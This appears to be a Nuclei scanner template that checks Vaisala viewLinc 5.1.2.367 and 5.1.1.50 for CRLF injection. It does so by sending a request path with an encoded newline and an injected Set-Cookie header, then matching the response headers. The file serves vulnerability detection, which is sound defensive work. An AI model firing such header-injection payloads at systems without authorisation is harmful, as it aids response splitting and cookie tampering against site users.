id: viewlinc-crlf-injection info: name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection. author: geeknik severity: low description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned. reference: - https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system tags: crlf,viewlinc requests: - method: GET path: - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection" matchers-condition: or matchers: - type: word words: - "Server: viewLinc/5.1.2.367" - "Set-Cookie: crlfinjection=crlfinjection" part: header condition: and - type: word words: - "Server: viewLinc/5.1.1.50" - "Set-Cookie: crlfinjection=crlfinjection" part: header condition: and